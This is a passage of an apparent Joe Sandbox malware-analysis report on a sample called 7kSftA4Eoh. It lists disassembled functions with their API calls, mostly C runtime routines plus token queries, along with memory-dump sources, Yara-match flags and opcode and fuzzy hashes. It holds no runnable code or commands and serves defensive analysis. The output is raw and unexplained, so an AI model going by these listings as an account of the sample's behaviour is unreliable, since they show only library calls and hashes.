                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2713391170
                                                                  • Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                                                  • Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
                                                                  • Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                                                  • Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4283191376
                                                                  • Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                                                  • Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
                                                                  • Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                                                  • Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Overflow range error (OVERFLOW), xrefs: 00401D00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4064033741
                                                                  • Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                                                  • Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
                                                                  • Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                                                  • Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2187435201
                                                                  • Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                                                  • Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
                                                                  • Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                                                  • Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Total loss of significance (TLOSS), xrefs: 00401D20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4273532761
                                                                  • Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                                                  • Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
                                                                  • Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                                                  • Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Argument singularity (SIGN), xrefs: 00401C78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2468659920
                                                                  • Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                                                  • Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
                                                                  • Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                                                  • Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704
                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32 ref: 009A774A
                                                                    • Part of subcall function 009AAA24: GetTokenInformation.ADVAPI32 ref: 009AAAB9
                                                                  • CloseHandle.KERNEL32 ref: 009A776B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Token$CloseHandleInformationOpenProcess
                                                                  • String ID: x86
                                                                  • API String ID: 4232945836-2105985432
                                                                  • Opcode ID: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
                                                                  • Instruction ID: 1a5cd93026961e4c2f986b354ac52fea2b9f85e855f7d43dbd718d407c2ee003
                                                                  • Opcode Fuzzy Hash: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
                                                                  • Instruction Fuzzy Hash: 58E0121571868082DB505B5AF68535AA7A5F7C9BD0F545025EF4947B1ACE2CC894CB40
                                                                  APIs
                                                                  • calloc.LIBCMT ref: 00991D6A
                                                                    • Part of subcall function 009BAD08: _calloc_impl.LIBCMT ref: 009BAD18
                                                                    • Part of subcall function 009BAD08: _errno.LIBCMT ref: 009BAD2B
                                                                    • Part of subcall function 009BAD08: _errno.LIBCMT ref: 009BAD35
                                                                  • free.LIBCMT ref: 00991EF3
                                                                  • free.LIBCMT ref: 00991EFD
                                                                  • free.LIBCMT ref: 00991F0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_calloc_implcalloc
                                                                  • String ID:
                                                                  • API String ID: 4000150058-0
                                                                  • Opcode ID: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
                                                                  • Instruction ID: 17d260f12eae772917fbfea25c996a890e4a1a68eda95b855020f76a9332bdd7
                                                                  • Opcode Fuzzy Hash: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
                                                                  • Instruction Fuzzy Hash: E0C11E76608B858ADB64CF69E48079E77B8F788B88F10412AEF8D47B58DF38C555CB00
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0354DDB8
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • _snprintf.LIBCMT ref: 0354DDD4
                                                                  • _snprintf.LIBCMT ref: 0354DE4A
                                                                  • _snprintf.LIBCMT ref: 0354DE61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3442832105-0
                                                                  • Opcode ID: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction ID: 26963b0f69a855957706cb588b5173a8d9fb927f6d95d59e30666bb9b48742c4
                                                                  • Opcode Fuzzy Hash: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction Fuzzy Hash: 8361C734618B498FDB45EF58E894BAAB3F5FBD4304F00466AE84AC3261DF34D945CB82
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
                                                                  • Instruction ID: 6ce9466f0741ca27fc1e98490d0e6323319cdf183abcdcd0f50e7bb996463faf
                                                                  • Opcode Fuzzy Hash: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
                                                                  • Instruction Fuzzy Hash: 9541E634618B064BCB1CDF2CE49557AB3E5FB8831471455ADE89BC7276EE20EC268781
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A92E0
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • free.LIBCMT ref: 009A9427
                                                                  • free.LIBCMT ref: 009A948B
                                                                  • free.LIBCMT ref: 009A9497
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 3531731211-0
                                                                  • Opcode ID: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
                                                                  • Instruction ID: d54715692d23318cb9d8a8227b6df19685ef786b7d620a523b3318257b1e9007
                                                                  • Opcode Fuzzy Hash: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
                                                                  • Instruction Fuzzy Hash: 0F51103530035596DE28EB2AE45037D73A5FBC6BC4F544826EE0A5BB6ADF7DC9028780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
                                                                  • Instruction ID: a06f2c93efe231682e9ae271d8e4ce76bfa9159d9b4dc3721ed659f9cbc0efd0
                                                                  • Opcode Fuzzy Hash: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
                                                                  • Instruction Fuzzy Hash: B941B03230478187CF1ADB3AE810B6E77A5F795B88F444925EE2A4BB15EF38D846C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
                                                                  • Instruction ID: 5327213162736a4d9dedb061f11b794d1ef06492c22a2065574ccc034b70cede
                                                                  • Opcode Fuzzy Hash: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
                                                                  • Instruction Fuzzy Hash: 5121B132704B8082EB59DFA2F5903296765FB89F8DF444626D94F17A7ADF38C480C7A1